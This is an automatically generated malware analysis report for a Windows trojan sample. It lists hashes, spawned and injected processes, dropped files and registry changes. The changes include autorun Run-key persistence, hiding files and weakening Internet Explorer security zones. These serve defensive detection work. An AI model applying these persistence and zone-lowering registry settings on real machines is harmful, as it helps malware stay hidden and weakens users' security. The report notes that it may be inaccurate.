Trojan.NSIS.StartPage_9f63e8b517

by malwarelabrobot on April 18th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.79781 (B) (Emsisoft), Gen:Variant.Zusy.79781 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 9f63e8b517f9578effb8adbf78bb3dce
SHA1: a60551d80de28799af96aefbc0138bf5abab21f5
SHA256: b934f1c369ae0c65a941476eb56f298ad51aec25832016914b09ddb599d4f418
SSDeep: 6144:sFG/GtASLSFJPOVmbPbn6r/Lu0gh9RGDeAMzRBMDdjg:sUG8JmKD6r/dgTUeAwRBMDdk
Size: 282112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-01-15 11:06:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
WScript.exe:368
CrashHandler.exe:420
CrashHandler.exe:680
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
bfgsetup_s1_l1.exe:1796
%original file name%.exe:1236
reg.exe:1164
reg.exe:620
reg.exe:232
reg.exe:204
reg.exe:1832
reg.exe:508
reg.exe:1352
reg.exe:1292
reg.exe:280
reg.exe:308
reg.exe:1176
reg.exe:996
reg.exe:468
reg.exe:208
reg.exe:1356
reg.exe:1496
reg.exe:964
reg.exe:904
reg.exe:968
reg.exe:2024
reg.exe:644
reg.exe:1100
reg.exe:544
reg.exe:1764

The Trojan injects its code into the following process(es):

Ptype.exe:752
Ptype.exe:1144
bfgsetup_s1_l1.exe:552
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128

File activity

The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
%Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)

The process WScript.exe:368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (0 bytes)

The process CrashHandler.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (0 bytes)

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)

The process Ptype.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)

The process Ptype.exe:1144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)

The process bfgsetup_s1_l1.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp (0 bytes)

The process bfgsetup_s1_l1.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsxB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp (0 bytes)

The process %original file name%.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)

Registry activity

The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 0B 8D 03 68 B4 5A 0A AE 26 A5 56 81 81 7A 40"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"Ptype.exe" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"CrashHandler.exe" = "CrashHandler"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WScript.exe:368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 C0 6E 7E 02 D2 21 AC E0 D6 9B AA FB CF 56 A6"

The process CrashHandler.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 3E A5 03 6E 9C F1 6A 40 42 98 F6 6C 81 5F E6"

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 87 A9 4C FA FE 23 FC 8B BE 42 FA 8B 98 B8 5D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Ptype.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 02 38 01 4D 04 26 FC 42 0B F9 FA 6B F3 6D 6F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not belong to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process Ptype.exe:1144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 93 6A A4 54 01 E5 34 0B 88 7E C7 D6 AF 63 58"

The process bfgsetup_s1_l1.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 B7 99 DE 09 47 4E 44 8E C3 B5 4C 45 06 17 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process bfgsetup_s1_l1.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 47 02 8C 53 40 9E BD 07 14 38 15 C0 8D 1F C6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Big Fish Games]
"Default" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 98 2B BC FF 43 3F 2E 76 B7 A1 AD 47 6F 25 D5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE" = "prueba1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not belong to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process reg.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 55 2A E5 B8 82 E4 E2 DF 10 A6 29 1B 61 AF 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "1"

The process reg.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 87 9B B9 04 C7 59 AE 02 09 58 B2 F1 5C 3F B6"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 5F 52 FA FF 04 8F DD BF D5 E3 FE D2 28 C2 53"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 28 1C 81 18 BD 50 36 49 FD A9 BF 9A 0D 0B A4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A B6 5F 42 F8 CE 0F 6D 9A 58 AC 7E B0 C2 27 35"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 44 E8 05 43 57 53 92 02 CA 03 5D 58 78 86 9E"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 77 27 A5 2F F3 C4 27 2E B3 5C 66 03 B9 7A 3F"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 ED B5 B6 90 D1 5D AE B3 58 25 25 F1 64 68 27"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 8B E6 D1 78 1B 00 F2 41 1F 91 04 8F 05 25 21"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 BA 54 4F C9 49 A0 2A D9 3A AF 71 DC 56 B3 2D"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A C4 76 4F 0B 40 11 5E 7C 64 00 63 A0 71 DF D4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB D4 B0 6F B1 46 B9 14 99 CE 94 F3 95 84 E6 4C"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

